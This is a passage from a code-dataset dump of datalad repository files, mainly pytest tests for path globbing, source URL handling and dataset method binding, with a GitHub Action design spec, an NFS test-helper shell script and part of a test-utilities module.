import Dataset\nfrom datalad.interface.results import (\n annexjson2result,\n get_status_dict,\n)\nfrom datalad.runner import CommandError\nfrom datalad.tests.utils_pytest import (\n eq_,\n with_tempfile,\n)\n\n\n@ with_tempfile\ndef test_annexjson2result(dspath=None):\n # no explicit success means 'error'\n eq_(annexjson2result(dict(), None),\n dict(status='error'))\n # unrecognized -> error\n eq_(annexjson2result(dict(success='random'), None),\n dict(status='error'))\n # success is possible ;-)\n eq_(annexjson2result(dict(success=True), None),\n dict(status='ok'))\n\n # path handling\n # needs a dataset\n ds = Dataset(dspath)\n eq_(annexjson2result(dict(file='file1'), ds),\n dict(status='error',\n path=str(ds.pathobj / 'file1')))\n # on all platforms, paths are reported in platform conventions\n # although git-annex reports in posix\n eq_(annexjson2result(dict(file='dir1/file1'), ds),\n dict(status='error',\n path=str(ds.pathobj / 'dir1' / 'file1')))\n\n\ndef tests_status_dict_exit_code():\n d = get_status_dict(exception=CommandError(code=105))\n eq_(d['exit_code'], 105)\n" }, { "alpha_fraction": 0.5180616974830627, "alphanum_fraction": 0.5229074954986572, "avg_line_length": 35.03174591064453, "blob_id": 
"ca6172b763688c8e920f151ab2f2c52b2d756e83", "content_id": "d1d66537416edee9c0499f7a1900c1197c1a377c", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2270, "license_type": "permissive", "max_line_length": 90, "num_lines": 63, "path": "/datalad/distribution/tests/test_utils.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test distribution utils\n\n\"\"\"\n\nimport os\nfrom os.path import join as opj\n\nfrom datalad.distribution.utils import _get_flexible_source_candidates\nfrom datalad.support.gitrepo import GitRepo\nfrom datalad.tests.utils_pytest import (\n assert_raises,\n eq_,\n known_failure_windows,\n with_tempfile,\n)\nfrom datalad.utils import (\n on_windows,\n unlink,\n)\n\n\n@known_failure_windows\ndef test_get_flexible_source_candidates():\n f = _get_flexible_source_candidates\n # for http and https (dummy transport) we should get /.git source added\n eq_(f('http://e.c'), ['http://e.c', 'http://e.c/.git'])\n eq_(f('http://e.c/s/p'), ['http://e.c/s/p', 'http://e.c/s/p/.git'])\n # for those candidates should be just the original address, since git\n # understands those just fine\n for s in ('http://e.c/.git',\n '/',\n 'relative/path',\n 'smallrelative',\n './neighbor',\n '../../look/into/parent/bedroom',\n 'p:somewhere',\n 'user@host:/full/path',\n ):\n eq_(_get_flexible_source_candidates(s), [s])\n # Now a few relative ones\n eq_(f('../r', '.'), ['../r'])\n eq_(f('../r', 'ssh://host/path'), ['ssh://host/r'])\n eq_(f('sub', 'ssh://host/path'), ['ssh://host/path/sub'])\n eq_(f('../r', 'http://e.c/p'), ['http://e.c/r', 'http://e.c/r/.git'])\n eq_(f('sub', 'http://e.c/p'), ['http://e.c/p/sub', 'http://e.c/p/sub/.git'])\n\n # tricky ones\n eq_(f('sub', 'http://e.c/p/.git'), ['http://e.c/p/sub/.git'])\n eq_(f('../s1/s2', 'http://e.c/p/.git'), ['http://e.c/s1/s2/.git'])\n\n # incorrect ones will stay incorrect\n eq_(f('../s1/s2', 'http://e.c/.git'), ['http://e.c/../s1/s2/.git'])\n\n # when source is not relative, but base_url is specified as just the destination path,\n # not really a \"base url\" as name was suggesting, then it should be ignored\n eq_(f('http://e.c/p', '/path'), ['http://e.c/p', 'http://e.c/p/.git'])\n" }, { "alpha_fraction": 0.5699177384376526, "alphanum_fraction": 0.5812769532203674, "avg_line_length": 24.530000686645508, "blob_id": "95c0f2788508d60fb0b15f4ee31d401e29effd7b", "content_id": "88d3c30d20b3d9f6c804146aee1a7c4637f0bef7", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2553, "license_type": "permissive", "max_line_length": 79, "num_lines": 100, "path": "/datalad/distribution/tests/test_dataset_binding.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test binding of functions to Dataset class\n\n\"\"\"\n\nfrom os.path import join as opj\n\nfrom 
datalad.tests.utils_pytest import (\n assert_raises,\n eq_,\n)\n\nfrom ..dataset import (\n Dataset,\n datasetmethod,\n)\n\n\ndef test_decorator():\n\n @datasetmethod\n def func(a, b, dataset=None, some_more=True):\n\n return {'a': a, 'b': b, 'dataset': dataset, 'some_more': some_more}\n\n ds = Dataset(opj('some', 'where'))\n\n orig = func(1, 2, ds, False)\n eq_(orig['a'], 1)\n eq_(orig['b'], 2)\n eq_(orig['dataset'], ds)\n eq_(orig['some_more'], False)\n\n # general call\n bound = ds.func(1, 2, False)\n eq_(orig, bound)\n\n # use default value\n bound = ds.func(1, 2)\n orig['some_more'] = True\n eq_(orig, bound)\n\n # too few arguments:\n assert_raises(TypeError, ds.func, 1)\n\n # too much arguments, by using original call with bound function,\n # raises proper TypeError:\n assert_raises(TypeError, ds.func, 1, 2, ds, False)\n\n # keyword argument 'dataset' is invalidated in Dataset-bound function:\n # raises proper TypeError:\n assert_raises(TypeError, ds.func, 1, 2, dataset='whatever')\n\n # test name parameter:\n @datasetmethod(name=\"new_name\")\n def another(some, dataset=None):\n return some\n\n eq_(ds.new_name('whatever'), 'whatever')\n\n\ndef test_decorator_star():\n @datasetmethod\n def func(a, b, *, dataset=None, some_more=True):\n\n return {'a': a, 'b': b, 'dataset': dataset, 'some_more': some_more}\n\n ds = Dataset(opj('some', 'where'))\n\n orig = func(1, 2, dataset=ds, some_more=False)\n eq_(orig['a'], 1)\n eq_(orig['b'], 2)\n eq_(orig['dataset'], ds)\n eq_(orig['some_more'], False)\n\n # general call\n bound = ds.func(1, 2, some_more=False)\n eq_(orig, bound)\n\n # use default value\n bound = ds.func(1, 2)\n orig['some_more'] = True\n eq_(orig, bound)\n\n # too few arguments:\n assert_raises(TypeError, ds.func, 1)\n\n # too much arguments, by using original call with bound function,\n # raises proper TypeError:\n assert_raises(TypeError, ds.func, 1, 2, ds)\n\n # keyword argument 'dataset' is invalidated in Dataset-bound function:\n # raises proper TypeError:\n assert_raises(TypeError, ds.func, 1, 2, dataset='whatever')\n" }, { "alpha_fraction": 0.5964447855949402, "alphanum_fraction": 0.6036308407783508, "avg_line_length": 19.984127044677734, "blob_id": "bb04eb19c9f9aa3c1a87aa8e42aa285ae10f14cc", "content_id": "7ba55513b200dffe7dff2ea63d980f36c5af2e90", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2644, "license_type": "permissive", "max_line_length": 87, "num_lines": 126, "path": "/docs/source/design/github_actions.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": ".. -*- mode: rst -*-\n.. vi: set ft=rst sts=4 ts=4 sw=4 et tw=79:\n\n.. _chap_design_github_action:\n\n*************\nGitHub Action\n*************\n\n.. 
topic:: Specification scope and status\n\n This specification describes a proposed interface to a DataLad GitHub Action.\n https://github.com/datalad/datalad-action provides an implementation which loosely\n followed this specification.\n\nThe purpose of the DataLad GitHub Action is to support CI testing with DataLad datasets\nby making it easy to install ``datalad`` and ``get`` data from the datasets.\n\n\nExample Usage\n=============\n\nDataset installed at ``${GITHUB_WORKSPACE}/studyforrest-data-phase2``,\n``get``'s all the data::\n\n - uses: datalad/datalad-action@master\n with:\n datasets:\n - source: https://github.com/psychoinformatics-de/studyforrest-data-phase2\n - install_get_data: true\n\nSpecify advanced options::\n\n - name: Download testing data\n uses: datalad/datalad-action@master\n with:\n datalad_version: ^0.15.5\n add_datalad_to_path: false\n datasets:\n - source: https://github.com/psychoinformatics-de/studyforrest-data-phase2\n - branch: develop\n - install_path: test_data\n - install_jobs: 2\n - install_get_data: false\n - recursive: true\n - recursion_limit: 2\n - get_jobs: 2\n - get_paths:\n - sub-01\n - sub-02\n - stimuli\n\nOptions\n=======\n\n``datalad_version``\n-------------------\n\n``datalad`` version to install. Defaults to the latest release.\n\n``add_datalad_to_path``\n-----------------------\n\nAdd ``datalad`` to the ``PATH`` for manual invocation in subsequent steps.\n\nDefaults to ``true``.\n\n``source``\n----------\n\nURL for the dataset (mandatory).\n\n``branch``\n----------\n\nGit branch to install (optional).\n\n``install_path``\n----------------\n\nPath to install the dataset relative to `GITHUB_WORKSPACE`.\n\nDefaults to the repository name.\n\n``install_jobs``\n----------------\n\nJobs to use for ``datalad install``.\n\nDefaults to ``auto``.\n\n``install_get_data``\n--------------------\n\nGet all the data in the dataset by passing ``--get-data`` to ``datalad install``.\n\nDefaults to ``false``.\n\n``recursive``\n-------------\n\nBoolean defining whether to clone subdatasets.\n\nDefaults to ``true``.\n\n``recursion_limit``\n-------------------\n\nInteger defining limits to recursion.\n\nIf not defined, there is no limit.\n\n``get_jobs``\n------------\n\nJobs to use for ``datalad get``.\n\nDefaults to ``auto``.\n\n\n``get_paths``\n-------------\n\nA list of paths in the dataset to download with ``datalad get``.\n\nDefaults to everything.\n" }, { "alpha_fraction": 0.6530843377113342, "alphanum_fraction": 0.66270512342453, "avg_line_length": 39.15909194946289, "blob_id": "59eaeaeb58839bb864a480bf6bccbcccf0452310", "content_id": "db3be69b7391471eedf55698daf7356c073b64c9", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1767, "license_type": "permissive", "max_line_length": 70, "num_lines": 44, "path": "/datalad/runner/tests/test_gitrunner.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "from __future__ import annotations\n\nfrom unittest.mock import patch\n\nfrom datalad.runner.coreprotocols import StdOutErrCapture\nfrom datalad.runner.protocol import GeneratorMixIn\nfrom datalad.tests.utils_pytest import assert_equal\n\nfrom ..gitrunner import GitWitlessRunner\n\n\nclass TestGeneratorProtocol(GeneratorMixIn, StdOutErrCapture):\n\n __test__ = False # class is not a class of tests\n\n\ndef test_gitrunner_generator() -> None:\n # Expect GitRunner._get_chunked_results() to return generators,\n # if the protocol is a subclass of GeneratorMixIn, and 
expect\n # run_on_filelist_chunks_items_ to yield elements from\n # all generators returned by GitRunner._get_chunked_results().\n git_runner = GitWitlessRunner([\"a\", \"b\", \"c\"])\n generator = git_runner.run_on_filelist_chunks_items_(\n [\"a\", \"b\", \"c\"],\n [\"f1.txt\", \"f2.txt\"],\n protocol=TestGeneratorProtocol)\n with patch.object(git_runner, \"_get_chunked_results\") as get_mock:\n get_mock.return_value = (range(2), range(3))\n assert_equal(tuple(generator), (0, 1, 0, 1, 2))\n\n\ndef test_gitrunner_list() -> None:\n # Expect GitRunner._get_chunked_results() to return generators,\n # if the protocol is a subclass of GeneratorMixIn, and expect\n # run_on_filelist_chunks_items_ to yield elements from\n # all generators returned by GitRunner._get_chunked_results().\n git_runner = GitWitlessRunner([\"a\", \"b\", \"c\"])\n with patch.object(git_runner, \"_get_chunked_results\") as get_mock:\n get_mock.return_value = ({\"a\": 1, \"b\": 2}, {\"a\": 3, \"b\": 4})\n result = git_runner.run_on_filelist_chunks(\n [\"a\", \"b\", \"c\"],\n [\"f1.txt\", \"f2.txt\"],\n protocol=StdOutErrCapture)\n assert_equal(result, {\"a\": 4, \"b\": 6})\n" }, { "alpha_fraction": 0.6861081719398499, "alphanum_fraction": 0.6861081719398499, "avg_line_length": 19.955554962158203, "blob_id": "27e0c29524e9e5636dcb738160dd85caebd84a55", "content_id": "37728a67701c3302262d99e680c64627e520f448", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 943, "license_type": "permissive", "max_line_length": 78, "num_lines": 45, "path": "/tools/eval_under_nfs", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# Evaluate given command while running with DATALAD_TESTS_TEMP_DIR pointing to\n# that temporary filesystem mounted using nfs\n\nset -e\n\nfs=nfs\n# TODO: nfs and mount options?\n\nset -u\ntmp=$(mktemp -u \"${TMPDIR:-/tmp}/datalad-nfs-XXXXX\")\n\n\nuid=$(id -u)\nmntorig=\"$tmp.orig\"\nmntpoint=\"$tmp.nfs\"\n\necho \"I: mounting $mntorig under $mntpoint via $fs\"\n\nset -x\n\nmkdir -p \"$mntpoint\"\nmkdir -p \"$mntorig\"\n\nif ! 
dpkg -l nfs-kernel-server | grep '^ii.*nfs-kernel-server'; then\n sudo apt-get install -y nfs-kernel-server\nfi\n\nsudo exportfs -o rw \"localhost:$mntorig\"\nsudo mount -t \"$fs\" \"localhost:$mntorig\" \"$mntpoint\"\n\n# should how it was mounted\nsudo mount | grep \"$mntpoint\" | sed -e 's,^,I: ,g'\n\n# Run the actual command\necho \"I: running $@\"\nTMPDIR=\"$mntpoint\" DATALAD_TESTS_TEMP_DIR=\"$mntpoint\" \"$@\"\nret=$?\n\necho \"I: done, unmounting\"\nsudo umount \"$mntpoint\"\nsudo exportfs -u \"localhost:$mntorig\"\n\nrm -rf \"$mntpoint\" \"$mntorig\"\nexit \"$ret\"\n" }, { "alpha_fraction": 0.8070175647735596, "alphanum_fraction": 0.8070175647735596, "avg_line_length": 56, "blob_id": "945fd6b0f469dd3f912ce1bfa910585dcae1e29a", "content_id": "7b87ba917f580859df6092f84ee7c07f967293d1", "detected_licenses": [ "BSD-3-Clause", "MIT", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 57, "license_type": "permissive", "max_line_length": 56, "num_lines": 1, "path": "/tools/testing/bad_internals/_scrapy/scrapy.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "raise ImportError(\"Scrapy import is ruined for testing\")\n" }, { "alpha_fraction": 0.4740850031375885, "alphanum_fraction": 0.48624417185783386, "avg_line_length": 37.956939697265625, "blob_id": "342a87496a9fcf0341c28984e2b7d9dfa312dd61", "content_id": "f7f526c0fc47613a272c254a30c9cf1db2eb479b", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8142, "license_type": "permissive", "max_line_length": 106, "num_lines": 209, "path": "/datalad/support/tests/test_globbedpaths.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-; coding: utf-8 -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"test GlobbedPaths\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nimport logging\nimport os.path as op\nfrom itertools import product\nfrom unittest.mock import patch\n\nfrom datalad.tests.utils_pytest import (\n OBSCURE_FILENAME,\n assert_in,\n eq_,\n swallow_logs,\n with_tree,\n)\n\nfrom ..globbedpaths import GlobbedPaths\n\n\ndef test_globbedpaths_get_sub_patterns():\n gp = GlobbedPaths([], \"doesn't matter\")\n for pat, expected in [\n # If there are no patterns in the directory component, we get no\n # sub-patterns.\n (\"\", []),\n (\"nodir\", []),\n (op.join(\"nomagic\", \"path\"), []),\n (op.join(\"nomagic\", \"path*\"), []),\n # Create sub-patterns from leading path, successively dropping the\n # right-most component.\n (op.join(\"s*\", \"path\"), [\"s*\" + op.sep]),\n (op.join(\"s\", \"ss*\", \"path\"), [op.join(\"s\", \"ss*\") + op.sep]),\n (op.join(\"s\", \"ss*\", \"path*\"), [op.join(\"s\", \"ss*\") + op.sep]),\n (op.join(\"s\", \"ss*\" + op.sep), []),\n (op.join(\"s*\", \"ss\", \"path*\"),\n [op.join(\"s*\", \"ss\") + op.sep,\n \"s*\" + op.sep]),\n (op.join(\"s?\", \"ss\", \"sss*\", \"path*\"),\n [op.join(\"s?\", \"ss\", \"sss*\") + op.sep,\n op.join(\"s?\", \"ss\") + op.sep,\n \"s?\" + op.sep])]:\n eq_(gp._get_sub_patterns(pat), expected)\n\n\nbOBSCURE_FILENAME = 
f\"b{OBSCURE_FILENAME}.dat\"\n\n\n@with_tree(tree={\"1.txt\": \"\",\n \"2.dat\": \"\",\n \"3.txt\": \"\",\n bOBSCURE_FILENAME: \"\",\n \"subdir\": {\"1.txt\": \"\", \"2.txt\": \"\", \"subsub\": {\"3.dat\": \"\"}}})\ndef test_globbedpaths(path=None):\n dotdir = op.curdir + op.sep\n\n for patterns, expected in [\n ([\"1.txt\", \"2.dat\"], {\"1.txt\", \"2.dat\"}),\n ([dotdir + \"1.txt\", \"2.dat\"], {dotdir + \"1.txt\", \"2.dat\"}),\n ([\"*.txt\", \"*.dat\"], {\"1.txt\", \"2.dat\", bOBSCURE_FILENAME, \"3.txt\"}),\n ([dotdir + \"*.txt\", \"*.dat\"],\n {dotdir + \"1.txt\", \"2.dat\", bOBSCURE_FILENAME, dotdir + \"3.txt\"}),\n ([op.join(\"subdir\", \"*.txt\")],\n {op.join(\"subdir\", \"1.txt\"), op.join(\"subdir\", \"2.txt\")}),\n ([\"subdir\" + op.sep], {\"subdir\" + op.sep}),\n ([dotdir + op.join(\"subdir\", \"*.txt\")],\n {dotdir + op.join(*ps)\n for ps in [(\"subdir\", \"1.txt\"), (\"subdir\", \"2.txt\")]}),\n ([\"*.txt\"], {\"1.txt\", \"3.txt\"}),\n ([op.join(\"subdir\", \"**\")],\n {op.join(*ps)\n for ps in [(\"subdir\" + op.sep,), (\"subdir\", \"subsub\"),\n (\"subdir\", \"1.txt\"), (\"subdir\", \"2.txt\"),\n (\"subdir\", \"subsub\", \"3.dat\")]}),\n ([dotdir + op.join(\"**\", \"*.dat\")],\n {dotdir + op.join(\"2.dat\"), dotdir + bOBSCURE_FILENAME,\n dotdir + op.join(\"subdir\", \"subsub\", \"3.dat\")})]:\n gp = GlobbedPaths(patterns, pwd=path)\n eq_(set(gp.expand()), expected)\n eq_(set(gp.expand(full=True)),\n {op.join(path, p) for p in expected})\n\n pardir = op.pardir + op.sep\n subdir_path = op.join(path, \"subdir\")\n for patterns, expected in [\n ([\"*.txt\"], {\"1.txt\", \"2.txt\"}),\n ([dotdir + \"*.txt\"], {dotdir + p for p in [\"1.txt\", \"2.txt\"]}),\n ([pardir + \"*.txt\"], {pardir + p for p in [\"1.txt\", \"3.txt\"]}),\n ([dotdir + pardir + \"*.txt\"],\n {dotdir + pardir + p for p in [\"1.txt\", \"3.txt\"]}),\n # Patterns that don't match are retained by default.\n ([\"amiss\"], {\"amiss\"})]:\n gp = GlobbedPaths(patterns, pwd=subdir_path)\n eq_(set(gp.expand()), expected)\n eq_(set(gp.expand(full=True)),\n {op.join(subdir_path, p) for p in expected})\n\n # Full patterns still get returned as relative to pwd.\n gp = GlobbedPaths([op.join(path, \"*.dat\")], pwd=path)\n eq_(gp.expand(), [\"2.dat\", bOBSCURE_FILENAME])\n\n # \".\" gets special treatment.\n gp = GlobbedPaths([\".\", \"*.dat\"], pwd=path)\n eq_(set(gp.expand()), {\"2.dat\", bOBSCURE_FILENAME, \".\"})\n eq_(gp.expand(dot=False), [\"2.dat\", bOBSCURE_FILENAME])\n gp = GlobbedPaths([\".\"], pwd=path, expand=False)\n eq_(gp.expand(), [\".\"])\n eq_(gp.paths, [\".\"])\n\n # We can the glob outputs.\n glob_results = {\"z\": \"z\",\n \"a\": [\"x\", \"d\", \"b\"]}\n with patch('glob.glob', lambda k, **kwargs: glob_results[k]):\n gp = GlobbedPaths([\"z\", \"a\"])\n eq_(gp.expand(), [\"z\", \"b\", \"d\", \"x\"])\n\n # glob expansion for paths property is determined by expand argument.\n for expand, expected in [(True, [\"2.dat\", bOBSCURE_FILENAME]),\n (False, [\"*.dat\"])]:\n gp = GlobbedPaths([\"*.dat\"], pwd=path, expand=expand)\n eq_(gp.paths, expected)\n\n with swallow_logs(new_level=logging.DEBUG) as cml:\n GlobbedPaths([\"not here\"], pwd=path).expand()\n assert_in(\"No matching files found for 'not here'\", cml.out)\n\n\n@with_tree(tree={\"1.txt\": \"\", \"2.dat\": \"\", \"3.txt\": \"\"})\ndef test_globbedpaths_misses(path=None):\n gp = GlobbedPaths([\"amiss\"], pwd=path)\n eq_(gp.expand_strict(), [])\n eq_(gp.misses, [\"amiss\"])\n eq_(gp.expand(include_misses=True), [\"amiss\"])\n\n # miss at beginning\n gp = 
GlobbedPaths([\"amiss\", \"*.txt\", \"*.dat\"], pwd=path)\n eq_(gp.expand_strict(), [\"1.txt\", \"3.txt\", \"2.dat\"])\n eq_(gp.expand(include_misses=True),\n [\"amiss\", \"1.txt\", \"3.txt\", \"2.dat\"])\n\n # miss in middle\n gp = GlobbedPaths([\"*.txt\", \"amiss\", \"*.dat\"], pwd=path)\n eq_(gp.expand_strict(), [\"1.txt\", \"3.txt\", \"2.dat\"])\n eq_(gp.misses, [\"amiss\"])\n eq_(gp.expand(include_misses=True),\n [\"1.txt\", \"3.txt\", \"amiss\", \"2.dat\"])\n\n # miss at end\n gp = GlobbedPaths([\"*.txt\", \"*.dat\", \"amiss\"], pwd=path)\n eq_(gp.expand_strict(), [\"1.txt\", \"3.txt\", \"2.dat\"])\n eq_(gp.misses, [\"amiss\"])\n eq_(gp.expand(include_misses=True),\n [\"1.txt\", \"3.txt\", \"2.dat\", \"amiss\"])\n\n # miss at beginning, middle, and end\n gp = GlobbedPaths([\"amiss1\", \"amiss2\", \"*.txt\", \"amiss3\", \"*.dat\",\n \"amiss4\"],\n pwd=path)\n eq_(gp.expand_strict(), [\"1.txt\", \"3.txt\", \"2.dat\"])\n eq_(gp.misses, [\"amiss1\", \"amiss2\", \"amiss3\", \"amiss4\"])\n eq_(gp.expand(include_misses=True),\n [\"amiss1\", \"amiss2\", \"1.txt\", \"3.txt\", \"amiss3\", \"2.dat\", \"amiss4\"])\n\n # Property expands if needed.\n gp = GlobbedPaths([\"amiss\"], pwd=path)\n eq_(gp.misses, [\"amiss\"])\n\n\n@with_tree(tree={\"adir\": {},\n \"bdir\": {},\n \"other\": {},\n \"1.txt\": \"\", \"2.dat\": \"\", \"3.txt\": \"\"})\ndef test_globbedpaths_partial_matches(path=None):\n gp = GlobbedPaths([op.join(\"?dir\", \"*.txt\"), \"*.txt\"], pwd=path)\n eq_(gp.expand_strict(), [\"1.txt\", \"3.txt\"])\n\n expected_partial = [\"adir\" + op.sep, \"bdir\" + op.sep]\n eq_(gp.partial_hits, expected_partial)\n eq_(gp.expand(include_partial=True),\n expected_partial + [\"1.txt\", \"3.txt\"])\n\n # Property expands if needed.\n gp = GlobbedPaths([op.join(\"?dir\", \"*.txt\")], pwd=path)\n eq_(gp.partial_hits, expected_partial)\n\n\n@with_tree(tree={\"1.txt\": \"\",\n \"2.dat\": \"\",\n \"3.txt\": \"\",\n \"foo.dat\": \"\"})\ndef test_globbedpaths_cached(path=None):\n # Smoke test to trigger cache handling.\n gp = GlobbedPaths([op.join(\"?\", \".dat\"), \"*.txt\"], pwd=path)\n for full, partial, misses in product([False, True], repeat=3):\n eq_(gp.expand(full=full,\n include_misses=misses,\n include_partial=partial),\n gp.expand(full=full,\n include_misses=misses,\n include_partial=partial))\n" }, { "alpha_fraction": 0.5967428684234619, "alphanum_fraction": 0.6015976667404175, "avg_line_length": 31.648414611816406, "blob_id": "a4ff727e9c6f4c500e65236389048d96e68c314d", "content_id": "191f3b1e8ae9ddda1fad260daa6d6c9f0804ce8b", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 68104, "license_type": "permissive", "max_line_length": 153, "num_lines": 2082, "path": "/datalad/tests/utils_pytest.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil; coding: utf-8 -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Miscellaneous utilities to assist with testing\"\"\"\n\nimport base64\nimport lzma\nimport multiprocessing\nimport multiprocessing.queues\nimport ssl\nimport textwrap\nfrom difflib import unified_diff\nfrom http.server import (\n HTTPServer,\n 
SimpleHTTPRequestHandler,\n)\nfrom json import dumps\nfrom unittest import SkipTest\nfrom unittest.mock import patch\n\nimport pytest\n\nimport datalad.utils as ut\nfrom datalad import cfg as dl_cfg\nfrom datalad.cmd import (\n StdOutErrCapture,\n WitlessRunner,\n)\n\nfrom datalad import utils\nfrom datalad.consts import ARCHIVES_TEMP_DIR\nfrom datalad.dochelpers import borrowkwargs\n\nfrom datalad.support.external_versions import (\n external_versions,\n get_rsync_version,\n)\nfrom datalad.support.keyring_ import MemoryKeyring\nfrom datalad.support.network import RI\nfrom datalad.support.vcr_ import *\n# TODO this must go\nfrom datalad.utils import *\n\n\n# temp paths used by clones\n_TEMP_PATHS_CLONES = set()\n\n\n# Additional indicators\non_travis = bool(os.environ.get('TRAVIS', False))\non_appveyor = bool(os.environ.get('APPVEYOR', False))\non_nfs = 'nfs' in os.getenv('TMPDIR', '')\n\nif external_versions[\"cmd:git\"] >= \"2.28\":\n # The specific value here doesn't matter, but it should not be the default\n # from any Git version to test that we work with custom values.\n DEFAULT_BRANCH = \"dl-test-branch\" # Set by setup_package().\nelse:\n DEFAULT_BRANCH = \"master\"\n\nif external_versions[\"cmd:git\"] >= \"2.30.0\":\n # The specific value here doesn't matter, but it should not be the default\n # from any Git version to test that we work with custom values.\n DEFAULT_REMOTE = \"dl-test-remote\" # Set by setup_package().\nelse:\n DEFAULT_REMOTE = \"origin\"\n\ndef attr(name):\n return getattr(pytest.mark, name)\n\ndef assert_equal(first, second, msg=None):\n if msg is None:\n assert first == second\n else:\n assert first == second, msg\n\ndef assert_false(expr, msg=None):\n if msg is None:\n assert not expr\n else:\n assert not expr, msg\n\ndef assert_greater(first, second, msg=None):\n if msg is None:\n assert first > second\n else:\n assert first > second, msg\n\ndef assert_greater_equal(first, second, msg=None):\n if msg is None:\n assert first >= second\n else:\n assert first >= second, msg\n\ndef assert_in(first, second, msg=None):\n if msg is None:\n assert first in second\n else:\n assert first in second, msg\n\nin_ = assert_in\n\ndef assert_is(first, second, msg=None):\n if msg is None:\n assert first is second\n else:\n assert first is second, msg\n\ndef assert_is_instance(first, second, msg=None):\n if msg is None:\n assert isinstance(first, second)\n else:\n assert isinstance(first, second), msg\n\ndef assert_is_none(expr, msg=None):\n if msg is None:\n assert expr is None\n else:\n assert expr is None, msg\n\ndef assert_is_not(first, second, msg=None):\n if msg is None:\n assert first is not second\n else:\n assert first is not second, msg\n\ndef assert_is_not_none(expr, msg=None):\n if msg is None:\n assert expr is not None\n else:\n assert expr is not None, msg\n\ndef assert_not_equal(first, second, msg=None):\n if msg is None:\n assert first != second\n else:\n assert first != second, msg\n\ndef assert_not_in(first, second, msg=None):\n if msg is None:\n assert first not in second\n else:\n assert first not in second, msg\n\ndef assert_not_is_instance(first, second, msg=None):\n if msg is None:\n assert not isinstance(first, second)\n else:\n assert not isinstance(first, second), msg\n\nassert_raises = pytest.raises\n\nassert_set_equal = assert_equal\n\ndef assert_true(expr, msg=None):\n if msg is None:\n assert expr\n else:\n assert expr, msg\n\neq_ = assert_equal\n\nok_ = assert_true\n\n# additional shortcuts\nneq_ = assert_not_equal\nnok_ = assert_false\n\nlgr = 
logging.getLogger(\"datalad.tests.utils_pytest\")\n\n\ndef skip_if_no_module(module):\n # Using pytest.importorskip here won't always work, as some imports (e.g.,\n # libxmp) can fail with exceptions other than ImportError\n try:\n imp = __import__(module)\n except Exception as exc:\n pytest.skip(\"Module %s fails to load\" % module, allow_module_level=True)\n\n\ndef skip_if_scrapy_without_selector():\n \"\"\"A little helper to skip some tests which require recent scrapy\"\"\"\n try:\n import scrapy\n from scrapy.selector import Selector\n except ImportError:\n pytest.skip(\n \"scrapy misses Selector (too old? version: %s)\"\n % getattr(scrapy, '__version__'))\n\n\ndef skip_if_url_is_not_available(url, regex=None):\n # verify that dataset is available\n from datalad.downloaders.base import DownloadError\n from datalad.downloaders.providers import Providers\n providers = Providers.from_config_files()\n try:\n content = providers.fetch(url)\n if regex and re.search(regex, content):\n pytest.skip(\"%s matched %r -- skipping the test\" % (url, regex))\n except DownloadError:\n pytest.skip(\"%s failed to download\" % url)\n\n\ndef check_not_generatorfunction(func):\n \"\"\"Internal helper to verify that we are not decorating generator tests\"\"\"\n if inspect.isgeneratorfunction(func):\n raise RuntimeError(\"{}: must not be decorated, is a generator test\"\n .format(func.__name__))\n\n\ndef skip_if_no_network(func=None):\n \"\"\"Skip test completely in NONETWORK settings\n\n If not used as a decorator, and just a function, could be used at the module level\n \"\"\"\n check_not_generatorfunction(func)\n\n def check_and_raise():\n if dl_cfg.get('datalad.tests.nonetwork'):\n pytest.skip(\"Skipping since no network settings\", allow_module_level=True)\n\n if func:\n @wraps(func)\n @attr('network')\n @attr('skip_if_no_network')\n def _wrap_skip_if_no_network(*args, **kwargs):\n check_and_raise()\n return func(*args, **kwargs)\n return _wrap_skip_if_no_network\n else:\n 